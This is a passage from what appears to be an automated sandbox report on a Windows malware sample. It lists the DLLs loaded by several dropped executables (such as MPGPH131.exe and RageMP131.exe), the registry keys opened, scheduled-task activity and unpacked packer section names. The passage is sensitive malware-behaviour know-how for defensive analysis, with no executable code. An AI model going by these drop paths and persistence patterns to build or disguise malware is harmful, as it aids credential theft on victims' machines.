                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: apphelp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winmm.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rstrtmgr.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ncrypt.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ntasn1.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: d3d11.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dxgi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: resourcepolicyclient.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: d3d10warp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dxcore.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: sspicli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ntmarta.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winhttp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: wininet.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: mswsock.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: devobj.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ondemandconnroutehelper.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: webio.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: iphlpapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winnsi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dnsapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rasadhlp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: fwpuclnt.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: schannel.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: mskeyprotect.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ncryptsslp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: msasn1.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: cryptsp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rsaenh.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: cryptbase.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: gpapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: vaultcli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: wintypes.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: windows.storage.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: wldp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dpapi.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: wsock32.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: version.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: winmm.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: mpr.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: wininet.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: iphlpapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: userenv.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: windows.storage.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: wldp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: propsys.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: profapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: edputil.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: urlmon.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: iertutil.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: srvcli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: netutils.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: windows.staterepositoryps.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: sspicli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: wintypes.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: appresolver.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: bcp47langs.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: slc.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: sppc.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: onecorecommonproxystub.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: onecoreuapcommonproxystub.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: pcacli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Section loaded: sfc_os.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: apphelp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winmm.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rstrtmgr.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ncrypt.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ntasn1.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: d3d11.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dxgi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: resourcepolicyclient.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: d3d10warp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: uxtheme.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dxcore.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: sspicli.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winhttp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wininet.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: mswsock.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: devobj.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ondemandconnroutehelper.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: webio.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: iphlpapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winnsi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dnsapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: fwpuclnt.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rasadhlp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: schannel.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: mskeyprotect.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ncryptsslp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: msasn1.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: cryptsp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rsaenh.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: cryptbase.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: gpapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: vaultcli.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wintypes.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: windows.storage.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wldp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ntmarta.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dpapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winmm.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rstrtmgr.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ncrypt.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ntasn1.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: d3d11.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dxgi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: resourcepolicyclient.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: d3d10warp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: uxtheme.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dxcore.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: sspicli.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winhttp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wininet.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: mswsock.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: devobj.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ondemandconnroutehelper.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: webio.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: iphlpapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: winnsi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dnsapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rasadhlp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: fwpuclnt.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: schannel.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: mskeyprotect.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ncryptsslp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: msasn1.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: cryptsp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: rsaenh.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: cryptbase.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: gpapi.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: vaultcli.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wintypes.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: windows.storage.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: wldp.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: ntmarta.dll
                                 Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Section loaded: dpapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winmm.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rstrtmgr.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ncrypt.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ntasn1.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: d3d11.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dxgi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: resourcepolicyclient.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: d3d10warp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dxcore.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: sspicli.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winhttp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: wininet.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: mswsock.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: devobj.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ondemandconnroutehelper.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: webio.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: iphlpapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: winnsi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: dnsapi.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rasadhlp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: fwpuclnt.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: schannel.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: mskeyprotect.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: ncryptsslp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: msasn1.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: cryptsp.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: rsaenh.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: cryptbase.dll
                                 Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Section loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Google Drive.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: BIT1C07.tmp.6.dr | LNK file: ..\..\Roaming\driverRemote_debug\UniversalInstaller.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe | Static file information: File size 1910784 > 1048576
Source: file.exe | Static PE information: Raw size of wqkjverv is bigger than: 0x100000 < 0x1a0c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Unpacked PE file: 2.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Unpacked PE file: 3.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Unpacked PE file: 8.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Unpacked PE file: 19.2.MPGPH131.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Unpacked PE file: 20.2.MPGPH131.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Unpacked PE file: 24.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Unpacked PE file: 26.2.amert.exe.860000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Unpacked PE file: 31.2.RageMP131.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
